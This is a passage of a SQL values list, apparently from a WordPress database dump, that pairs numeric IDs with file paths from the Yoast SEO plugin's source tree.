ted/frontend/schema/class-schema-ids.php'),(2304,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-image.php'),(2305,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-main-image.php'),(2306,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-organization.php'),(2307,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-person.php'),(2308,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-utils.php'),(2309,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-webpage.php'),(2310,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-website.php'),(2311,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema.php'),(2312,'wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/interface-wpseo-graph-piece.php'),(2313,'wp-content/plugins/wordpress-seo/src/deprecated/inc/class-wpseo-validator.php'),(2314,'wp-content/plugins/wordpress-seo/src/deprecated/index.php'),(2315,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/abstract-link-indexing-action.php'),(2316,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-complete-indexation-action.php'),(2317,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-general-indexation-action.php'),(2318,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-post-indexation-action.php'),(2319,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-post-type-archive-indexation-action.php'),(2320,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-prepare-indexation-action.php'),(2321,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-term-indexation-action.php'),(2322,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexation-action-interface.php'),(2323,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/post-link-indexing-action.php'),(2324,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/term-link-indexing-action.php'),(2325,'wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexing/indexable-prepare-indexation-action.php'),(2326,'wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/farsi-support-conditional.php'),(2327,'wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/greek-support-conditional.php'),(2328,'wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/japanese-support-conditional.php'),(2329,'wp-content/plugins/wordpress-seo/src/deprecated/src/conditionals/norwegian-readability-conditional.php'),(2330,'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/indexation-integration.php'),(2331,'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/link-count-notification-integration.php'),(2332,'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/admin/link-count-tools-integration.php'),(2333,'wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/third-party/elementor.php'),(2334,'wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-list-item-presenter.php'),(2335,'wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-modal-presenter.php'),(2336,'wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-permalink-warning-presenter.php'),(2337,'wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-warning-presenter.php'),(2338,'wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/link-count-indexing-list-item-presenter.php'),(2339,'wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/link-count-indexing-modal-presenter.php'),(2340,'wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/open-graph/fb-app-id-presenter.php'),(2341,'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-activation-error-exception.php'),(2342,'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-already-installed-exception.php'),(2343,'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/addon-installation-error-exception.php'),(2344,'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-activate-plugins-exception.php'),(2345,'wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-install-plugins-exception.php'),(2346,'wp-content/plugins/wordpress-seo/src/exceptions/importing/aioseo-validation-exception.php'),(2347,'wp-content/plugins/wordpress-seo/src/exceptions/indexable/indexable-exception.php'),(2348,'wp-content/plugins/wordpress-seo/src/exceptions/indexable/invalid-term-exception.php'),(2349,'wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-not-found-exception.php'),(2350,'wp-content/plugins/wordpress-seo/src/exceptions/indexable/source-exception.php'),(2351,'wp-content/plugins/wordpress-seo/src/exceptions/indexable/term-not-found-exception.php'),(2352,'wp-content/plugins/wordpress-seo/src/exceptions/missing-method.php'),(2353,'wp-content/plugins/wordpress-seo/src/exceptions/oauth/authentication-failed-exception.php'),(2354,'wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-property-exception.php'),(2355,'wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/empty-token-exception.php'),(2356,'wp-content/plugins/wordpress-seo/src/exceptions/oauth/tokens/failed-storage-exception.php'),(2357,'wp-content/plugins/wordpress-seo/src/functions.php'),(2358,'wp-content/plugins/wordpress-seo/src/generated/assets/externals.php'),(2359,'wp-content/plugins/wordpress-seo/src/generated/assets/languages.php'),(2360,'wp-content/plugins/wordpress-seo/src/generated/assets/plugin.php'),(2361,'wp-content/plugins/wordpress-seo/src/generated/container.php'),(2362,'wp-content/plugins/wordpress-seo/src/generators/breadcrumbs-generator.php'),(2363,'wp-content/plugins/wordpress-seo/src/generators/generator-interface.php'),(2364,'wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php'),(2365,'wp-content/plugins/wordpress-seo/src/generators/open-graph-locale-generator.php'),(2366,'wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php'),(2367,'wp-content/plugins/wordpress-seo/src/generators/schema/article.php'),(2368,'wp-content/plugins/wordpress-seo/src/generators/schema/author.php'),(2369,'wp-content/plugins/wordpress-seo/src/generators/schema/breadcrumb.php'),(2370,'wp-content/plugins/wordpress-seo/src/generators/schema/faq.php'),(2371,'wp-content/plugins/wordpress-seo/src/generators/schema/howto.php'),(2372,'wp-content/plugins/wordpress-seo/src/generators/schema/main-image.php'),(2373,'wp-content/plugins/wordpress-seo/src/generators/schema/organization.php'),(2374,'wp-content/plugins/wordpress-seo/src/generators/schema/person.php'),(2375,'wp-content/plugins/wordpress-seo/src/generators/schema/third-party/events-calendar-schema.php'),(2376,'wp-content/plugins/wordpress-seo/src/generators/schema/webpage.php'),(2377,'wp-content/plugins/wordpress-seo/src/generators/schema/website.php'),(2378,'wp-content/plugins/wordpress-seo/src/generators/schema-generator.php'),(2379,'wp-content/plugins/wordpress-seo/src/generators/twitter-image-generator.php'),(2380,'wp-content/plugins/wordpress-seo/src/helpers/aioseo-helper.php'),(2381,'wp-content/plugins/wordpress-seo/src/helpers/asset-helper.php'),(2382,'wp-content/plugins/wordpress-seo/src/helpers/author-archive-helper.php'),(2383,'wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php'),(2384,'wp-content/plugins/wordpress-seo/src/helpers/capability-helper.php'),(2385,'wp-content/plugins/wordpress-seo/src/helpers/curl-helper.php'),(2386,'wp-content/plugins/wordpress-seo/src/helpers/current-page-helper.php'),(2387,'wp-content/plugins/wordpress-seo/src/helpers/date-helper.php'),(2388,'wp-content/plugins/wordpress-seo/src/helpers/environment-helper.php'),(2389,'wp-content/plugins/wordpress-seo/src/helpers/home-url-helper.php'),(2390,'wp-content/plugins/wordpress-seo/src/helpers/image-helper.php'),(2391,'wp-content/plugins/wordpress-seo/src/helpers/import-cursor-helper.php'),(2392,'wp-content/plugins/wordpress-seo/src/helpers/import-helper.php'),(2393,'wp-content/plugins/wordpress-seo/src/helpers/indexable-helper.php'),(2394,'wp-content/plugins/wordpress-seo/src/helpers/indexable-to-postmeta-helper.php'),(2395,'wp-content/plugins/wordpress-seo/src/helpers/indexing-helper.php'),(2396,'wp-content/plugins/wordpress-seo/src/helpers/input-helper.php'),(2397,'wp-content/plugins/wordpress-seo/src/helpers/language-helper.php'),(2398,'wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php'),(2399,'wp-content/plugins/wordpress-seo/src/helpers/notification-helper.php'),(2400,'wp-content/plugins/wordpress-seo/src/helpers/open-graph/image-helper.php'),(2401,'wp-content/plugins/wordpress-seo/src/helpers/open-graph/values-helper.php'),(2402,'wp-content/plugins/wordpress-seo/src/helpers/options-helper.php'),(2403,'wp-content/plugins/wordpress-seo/src/helpers/pagination-helper.php'),(2404,'wp-content/plugins/wordpress-seo/src/helpers/permalink-helper.php'),(2405,'wp-content/plugins/wordpress-seo/src/helpers/post-helper.php'),(2406,'wp-content/plugins/wordpress-seo/src/helpers/post-type-helper.php'),(2407,'wp-content/plugins/wordpress-seo/src/helpers/primary-term-helper.php'),(2408,'wp-content/plugins/wordpress-seo/src/helpers/product-helper.php'),(2409,'wp-content/plugins/wordpress-seo/src/helpers/redirect-helper.php'),(2410,'wp-content/plugins/wordpress-seo/src/helpers/request-helper.php'),(2411,'wp-content/plugins/wordpress-seo/src/helpers/require-file-helper.php'),(2412,'wp-content/plugins/wordpress-seo/src/helpers/robots-helper.php'),(2413,'wp-content/plugins/wordpress-seo/src/helpers/sanitization-helper.php'),(2414,'wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php'),(2415,'wp-content/plugins/wordpress-seo/src/helpers/schema/html-helper.php'),(2416,'wp-content/plugins/wordpress-seo/src/helpers/schema/id-helper.php'),(2417,'wp-content/plugins/wordpress-seo/src/helpers/schema/image-helper.php'),(2418,'wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php'),(2419,'wp-content/plugins/wordpress-seo/src/helpers/schema/replace-vars-helper.php'),(2420,'wp-content/plugins/wordpress-seo/src/helpers/short-link-helper.php'),(2421,'wp-content/plugins/wordpress-seo/src/helpers/site-helper.php'),(2422,'wp-content/plugins/wordpress-seo/src/helpers/string-helper.php'),(2423,'wp-content/plugins/wordpress-seo/src/helpers/taxonomy-helper.php'),(2424,'wp-content/plugins/wordpress-seo/src/helpers/twitter/image-helper.php'),(2425,'wp-content/plugins/wordpress-seo/src/helpers/url-helper.php'),(2426,'wp-content/plugins/wordpress-seo/src/helpers/user-helper.php'),(2427,'wp-content/plugins/wordpress-seo/src/helpers/wincher-helper.php'),(2428,'wp-content/plugins/wordpress-seo/src/helpers/woocommerce-helper.php'),(2429,'wp-content/plugins/wordpress-seo/src/helpers/wordpress-helper.php'),(2430,'wp-content/plugins/wordpress-seo/src/helpers/wpdb-helper.php'),(2431,'wp-content/plugins/wordpress-seo/src/initializers/disable-core-sitemaps.php'),(2432,'wp-content/plugins/wordpress-seo/src/initializers/initializer-interface.php'),(2433,'wp-content/plugins/wordpress-seo/src/initializers/migration-runner.php'),(2434,'wp-content/plugins/wordpress-seo/src/integrations/abstract-exclude-post-type.php'),(2435,'wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/dialog-integration.php'),(2436,'wp-content/plugins/wordpress-seo/src/integrations/admin/addon-installation/installation-integration.php'),(2437,'wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php'),(2438,'wp-content/plugins/wordpress-seo/src/integrations/admin/background-indexing-integration.php'),(2439,'wp-content/plugins/wordpress-seo/src/integrations/admin/configuration-workout-integration.php'),(2440,'wp-content/plugins/wordpress-seo/src/integrations/admin/configurationworkout-notice-integration.php'),(2441,'wp-content/plugins/wordpress-seo/src/integrations/admin/cron-integration.php'),(2442,'wp-content/plugins/wordpress-seo/src/integrations/admin/disable-concatenate-scripts-integration.php'),(2443,'wp-content/plugins/wordpress-seo/src/integrations/admin/fix-news-dependencies-integration.php'),(2444,'wp-content/plugins/wordpress-seo/src/integrations/admin/health-check-integration.php'),(2445,'wp-content/plugins/wordpress-seo/src/integrations/admin/helpscout-beacon.php'),(2446,'wp-content/plugins/wordpress-seo/src/integrations/admin/import-integration.php'),(2447,'wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-notification-integration.php'),(2448,'wp-content/plugins/wordpress-seo/src/integrations/admin/indexing-tool-integration.php'),(2449,'wp-content/plugins/wordpress-seo/src/integrations/admin/installation-success-integration.php'),(2450,'wp-content/plugins/wordpress-seo/src/integrations/admin/link-count-columns-integration.php'),(2451,'wp-content/plugins/wordpress-seo/src/integrations/admin/menu-badge-integration.php'),(2452,'wp-content/plugins/wordpress-seo/src/integrations/admin/migration-error-integration.php'),(2453,'wp-content/plugins/wordpress-seo/src/integrations/admin/ryte-integration.php'),(2454,'wp-content/plugins/wordpress-seo/src/integrations/admin/social-templates-integration.php'),(2455,'wp-content/plugins/wordpress-seo/src/integrations/admin/workouts-integration.php'),(2456,'wp-content/plugins/wordpress-seo/src/integrations/alerts/abstract-dismissable-alert.php'),(2457,'wp-content/plugins/wordpress-seo/src/integrations/blocks/abstract-dynamic-block.php'),(2458,'wp-content/plugins/wordpress-seo/src/integrations/blocks/block-categories.php'),(2459,'wp-content/plugins/wordpress-seo/src/integrations/blocks/breadcrumbs-block.php'),(2460,'wp-content/plugins/wordpress-seo/src/integrations/blocks/structured-data-blocks.php'),(2461,'wp-content/plugins/wordpress-seo/src/integrations/breadcrumbs-integration.php'),(2462,'wp-content/plugins/wordpress-seo/src/integrations/cleanup-integration.php'),(2463,'wp-content/plugins/wordpress-seo/src/integrations/duplicate-post-integration.php'),(2464,'wp-content/plugins/wordpress-seo/src/integrations/estimated-reading-time.php'),(2465,'wp-content/plugins/wordpress-seo/src/integrations/exclude-oembed-cache-post-type.php'),(2466,'wp-content/plugins/wordpress-seo/src/integrations/feature-flag-integration.php'),(2467,'wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php'),(2468,'wp-content/plugins/wordpress-seo/src/integrations/front-end/category-term-description.php'),(2469,'wp-content/plugins/wordpress-seo/src/integrations/front-end/comment-link-fixer.php'),(2470,'wp-content/plugins/wordpress-seo/src/integrations/front-end/force-rewrite-title.php'),(2471,'wp-content/plugins/wordpress-seo/src/integrations/front-end/handle-404.php'),(2472,'wp-content/plugins/wordpress-seo/src/integrations/front-end/indexing-controls.php'),(2473,'wp-content/plugins/wordpress-seo/src/integrations/front-end/open-graph-oembed.php'),(2474,'wp-content/plugins/wordpress-seo/src/integrations/front-end/redirects.php'),(2475,'wp-content/plugins/wordpress-seo/src/integrations/front-end/rss-footer-embed.php'),(2476,'wp-content/plugins/wordpress-seo/src/integrations/front-end/schema-accessibility-feature.php'),(2477,'wp-content/plugins/wordpress-seo/src/integrations/front-end/theme-titles.php'),(2478,'wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php'),(2479,'wp-content/plugins/wordpress-seo/src/integrations/front-end-integration.php'),(2480,'wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php'),(2481,'wp-content/plugins/wordpress-seo/src/integrations/primary-category.php'),(2482,'wp-content/plugins/wordpress-seo/src/integrations/schema-blocks.php'),(2483,'wp-content/plugins/wordpress-seo/src/integrations/third-party/amp.php'),(2484,'wp-content/plugins/wordpress-seo/src/integrations/third-party/bbpress.php'),(2485,'wp-content/plugins/wordpress-seo/src/integrations/third-party/elementor.php'),(2486,'wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-elementor-post-types.php'),(2487,'wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-woocommerce-post-types.php'),(2488,'wp-content/plugins/wordpress-seo/src/integrations/third-party/jetpack.php'),(2489,'wp-content/plugins/wordpress-seo/src/integrations/third-party/the-events-calendar.php'),(2490,'wp-content/plugins/wordpress-seo/src/integrations/third-party/w3-total-cache.php'),(2491,'wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories.php'),(2492,'wp-content/plugins/wordpress-seo/src/integrations/third-party/wincher-publish.php'),(2493,'wp-content/plugins/wordpress-seo/src/integrations/third-party/wincher.php'),(2494,'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-permalinks.php'),(2495,'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce.php'),(2496,'wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml-wpseo-notification.php'),(2497,'wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml.php'),(2498,'wp-content/plugins/wordpress-seo/src/integrations/uninstall-integration.php'),(2499,'wp-content/plugins/wordpress-seo/src/integrations/watchers/addon-update-watcher.php'),(2500,'wp-content/plugins/wordpress-seo/src/integrations/watchers/auto-update-watcher.php'),(2501,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-ancestor-watcher.php'),(2502,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-watcher.php'),(2503,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-category-permalink-watcher.php'),(2504,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-date-archive-watcher.php'),(2505,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-home-page-watcher.php'),(2506,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-homeurl-watcher.php'),(2507,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php'),(2508,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-meta-watcher.php'),(2509,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-archive-watcher.php'),(2510,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-watcher.php'),(2511,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-static-home-page-watcher.php'),(2512,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-system-page-watcher.php'),(2513,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-term-watcher.php'),(2514,'wp-content/plugins/wordpress-seo/src/integrations/watchers/option-titles-watcher.php'),(2515,'wp-content/plugins/wordpress-seo/src/integrations/watchers/option-wpseo-watcher.php'),(2516,'wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-category-quick-edit-watcher.php'),(2517,'wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-term-watcher.php'),(2518,'wp-content/plugins/wordpress-seo/src/integrations/xmlrpc.php'),(2519,'wp-content/plugins/wordpress-seo/src/loadable-interface.php'),(2520,'wp-content/plugins/wordpress-seo/src/loader.php'),(2521,'wp-content/plugins/wordpress-seo/src/loggers/logger.php'),(2522,'wp-content/plugins/wordpress-seo/src/main.php'),(2523,'wp-content/plugins/wordpress-seo/src/memoizers/meta-tags-context-memoizer.php'),(2524,'wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php'),(2525,'wp-content/plugins/wordpress-seo/src/models/indexable-extension.php'),(2526,'wp-content/plugins/wordpress-seo/src/models/indexable-hierarchy.php'),(2527,'wp-content/plugins/wordpress-seo/src/models/indexable.php'),(2528,'wp-content/plugins/wordpress-seo/src/models/primary-term.php'),(2529,'wp-content/plugins/wordpress-seo/src/models/seo-links.php'),(2530,'wp-content/plugins/wordpress-seo/src/models/seo-meta.php'),(2531,'wp-content/plugins/wordpress-seo/src/presentations/abstract-presentation.php'),(2532,'wp-content/plugins/wordpress-seo/src/presentations/archive-adjacent-trait.php'),(2533,'wp-content/plugins/wordpress-seo/src/presentations/indexable-author-archive-presentation.php'),(2534,'wp-content/plugins/wordpress-seo/src/presentations/indexable-date-archive-presentation.php'),(2535,'wp-content/plugins/wordpress-seo/src/presentations/indexable-error-page-presentation.php'),(2536,'wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php'),(2537,'wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-archive-presentation.php'),(2538,'wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-presentation.php'),(2539,'wp-content/plugins/wordpress-seo/src/presentations/indexable-presentation.php'),(2540,'wp-content/plugins/wordpress-seo/src/presentations/indexable-search-result-page-presentation.php'),(2541,'wp-content/plugins/wordpress-seo/src/presentations/indexable-static-home-page-presentation.php'),(2542,'wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php'),(2543,'wp-content/plugins/wordpress-seo/src/presentations/indexable-term-archive-presentation.php'),(2544,'wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php'),(2545,'wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php'),(2546,'wp-content/plugins/wordpress-seo/src/presenters/abstract-presenter.php'),(2547,'wp-content/plugins/wordpress-seo/src/presenters/admin/alert-presenter.php'),(2548,'wp-content/plugins/wordpress-seo/src/presenters/admin/auto-update-notification-presenter.php'),(2549,'wp-content/plugins/wordpress-seo/src/presenters/admin/badge-presenter.php'),(2550,'wp-content/plugins/wordpress-seo/src/presenters/admin/help-link-presenter.php'),(2551,'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-error-presenter.php'),(2552,'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php'),(2553,'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-list-item-presenter.php'),(2554,'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-notification-presenter.php'),(2555,'wp-content/plugins/wordpress-seo/src/presenters/admin/light-switch-presenter.php'),(2556,'wp-content/plugins/wordpress-seo/src/presenters/admin/meta-fields-presenter.php'),(2557,'wp-content/plugins/wordpress-seo/src/presenters/admin/migration-error-presenter.php'),(2558,'wp-content/plugins/wordpress-seo/src/presenters/admin/notice-presenter.php'),(2559,'wp-content/plugins/wordpress-seo/src/presenters/admin/premium-badge-presenter.php'),(2560,'wp-content/plugins/wordpress-seo/src/presenters/bingbot-presenter.php'),(2561,'wp-content/plugins/wordpress-seo/src/presenters/breadcrumbs-presenter.php'),(2562,'wp-content/plugins/wordpress-seo/src/presenters/canonical-presenter.php'),(2563,'wp-content/plugins/wordpress-seo/src/presenters/debug/marker-close-presenter.php'),(2564,'wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php'),(2565,'wp-content/plugins/wordpress-seo/src/presenters/googlebot-presenter.php'),(2566,'wp-content/plugins/wordpress-seo/src/presenters/meta-description-presenter.php'),(2567,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-author-presenter.php'),(2568,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-modified-time-presenter.php'),(2569,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-published-time-presenter.php'),(2570,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-publisher-presenter.php'),(2571,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php'),(2572,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/image-presenter.php'),(2573,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/locale-presenter.php'),(2574,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/site-name-presenter.php'),(2575,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php'),(2576,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/type-presenter.php'),(2577,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php'),(2578,'wp-content/plugins/wordpress-seo/src/presenters/rel-next-presenter.php'),(2579,'wp-content/plugins/wordpress-seo/src/presenters/rel-prev-presenter.php'),(2580,'wp-content/plugins/wordpress-seo/src/presenters/robots-presenter.php'),(2581,'wp-content/plugins/wordpress-seo/src/presenters/schema-presenter.php'),(2582,'wp-content/plugins/wordpress-seo/src/presenters/slack/enhanced-data-presenter.php'),(2583,'wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php'),(2584,'wp-content/plugins/wordpress-seo/src/presenters/twitter/card-presenter.php'),(2585,'wp-content/plugins/wordpress-seo/src/presenters/twitter/creator-presenter.php'),(2586,'wp-content/plugins/wordpress-seo/src/presenters/twitter/description-presenter.php'),(2587,'wp-content/plugins/wordpress-seo/src/presenters/twitter/image-presenter.php'),(2588,'wp-content/plugins/wordpress-seo/src/presenters/twitter/site-presenter.php'),(2589,'wp-content/plugins/wordpress-seo/src/presenters/twitter/title-presenter.php'),(2590,'wp-content/plugins/wordpress-seo/src/presenters/url-list-presenter.php'),(2591,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/baidu-presenter.php'),(2592,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/bing-presenter.php'),(2593,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/google-presenter.php'),(2594,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/pinterest-presenter.php'),(2595,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/yandex-presenter.php'),(2596,'wp-content/plugins/wordpress-seo/src/repositories/indexable-hierarchy-repository.php'),(2597,'wp-content/plugins/wordpress-seo/src/repositories/indexable-repository.php'),(2598,'wp-content/plugins/wordpress-seo/src/repositories/primary-term-repository.php'),(2599,'wp-content/plugins/wordpress-seo/src/repositories/seo-links-repository.php'),(2600,'wp-content/plugins/wordpress-seo/src/repositories/seo-meta-repository.php'),(2601,'wp-content/plugins/wordpress-seo/src/routes/abstract-action-route.php'),(2602,'wp-content/plugins/wordpress-seo/src/routes/abstract-indexation-route.php'),(2603,'wp-content/plugins/wordpress-seo/src/routes/alert-dismissal-route.php'),(2604,'wp-content/plugins/wordpress-seo/src/routes/configuration-workout-route.php'),(2605,'wp-content/plugins/wordpress-seo/src/routes/importing-route.php'),(2606,'wp-content/plugins/wordpress-seo/src/routes/indexables-head-route.php'),(2607,'wp-content/plugins/wordpress-seo/src/routes/indexing-route.php'),(2608,'wp-content/plugins/wordpress-seo/src/routes/route-interface.php'),(2609,'wp-content/plugins/wordpress-seo/src/routes/semrush-route.php'),(2610,'wp-content/plugins/wordpress-seo/src/routes/supported-features-route.php'),(2611,'wp-content/plugins/wordpress-seo/src/routes/wincher-route.php'),(2612,'wp-content/plugins/wordpress-seo/src/routes/workouts-route.php'),(2613,'wp-content/plugins/wordpress-seo/src/routes/yoast-head-rest-field.php'),(2614,'wp-content/plugins/wordpress-seo/src/schema-templates/assets/icons.php'),(2615,'wp-content/plugins/wordpress-seo/src/schema-templates/cooking-time.block.php'),(2616,'wp-content/plugins/wordpress-seo/src/schema-templates/cooking-time.schema.php'),(2617,'wp-content/plugins/wordpress-seo/src/schema-templates/image.schema.php'),(2618,'wp-content/plugins/wordpress-seo/src/schema-templates/preparation-time.block.php'),(2619,'wp-content/plugins/wordpress-seo/src/schema-templates/preparation-time.schema.php'),(2620,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe-description.block.php'),(2621,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe-description.schema.php'),(2622,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe-ingredients.block.php'),(2623,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe-ingredients.schema.php'),(2624,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe-instructions.block.php'),(2625,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe-instructions.schema.php'),(2626,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe-name.block.php'),(2627,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe-name.schema.php'),(2628,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe.block.php'),(2629,'wp-content/plugins/wordpress-seo/src/schema-templates/recipe.schema.php'),(2630,'wp-content/plugins/wordpress-seo/src/services/health-check/curl-check.php'),(2631,'wp-content/plugins/wordpress-seo/src/services/health-check/curl-reports.php'),(2632,'wp-content/plugins/wordpress-seo/src/services/health-check/curl-runner.php'),(2633,'wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-check.php'),(2634,'wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-reports.php'),(2635,'wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-runner.php'),(2636,'wp-content/plugins/wordpress-seo/src/services/health-check/health-check.php'),(2637,'wp-content/plugins/wordpress-seo/src/services/health-check/links-table-check.php'),(2638,'wp-content/plugins/wordpress-seo/src/services/health-check/links-table-reports.php'),(2639,'wp-content/plugins/wordpress-seo/src/services/health-check/links-table-runner.php'),(2640,'wp-content/plugins/wordpress-seo/src/services/health-check/myyoast-api-request-factory.php'),(2641,'wp-content/plugins/wordpress-seo/src/services/health-check/page-comments-check.php'),(2642,'wp-content/plugins/wordpress-seo/src/services/health-check/page-comments-reports.php'),(2643,'wp-content/plugins/wordpress-seo/src/services/health-check/page-comments-runner.php'),(2644,'wp-content/plugins/wordpress-seo/src/services/health-check/postname-permalink-check.php'),(2645,'wp-content/plugins/wordpress-seo/src/services/health-check/postname-permalink-reports.php'),(2646,'wp-content/plugins/wordpress-seo/src/services/health-check/postname-permalink-runner.php'),(2647,'wp-content/plugins/wordpress-seo/src/services/health-check/report-builder-factory.php'),(2648,'wp-content/plugins/wordpress-seo/src/services/health-check/report-builder.php'),(2649,'wp-content/plugins/wordpress-seo/src/services/health-check/reports-trait.php'),(2650,'wp-content/plugins/wordpress-seo/src/services/health-check/runner-interface.php'),(2651,'wp-content/plugins/wordpress-seo/src/services/health-check/ryte-check.php'),(2652,'wp-content/plugins/wordpress-seo/src/services/health-check/ryte-reports.php'),(2653,'wp-content/plugins/wordpress-seo/src/services/health-check/ryte-runner.php'),(2654,'wp-content/plugins/wordpress-seo/src/services/importing/aioseo/aioseo-replacevar-service.php'),(2655,'wp-content/plugins/wordpress-seo/src/services/importing/aioseo/aioseo-robots-provider-service.php'),(2656,'wp-content/plugins/wordpress-seo/src/services/importing/aioseo/aioseo-robots-transformer-service.php'),(2657,'wp-content/plugins/wordpress-seo/src/services/importing/aioseo/aioseo-social-images-provider-service.php'),(2658,'wp-content/plugins/wordpress-seo/src/services/importing/conflicting-plugins-service.php'),(2659,'wp-conten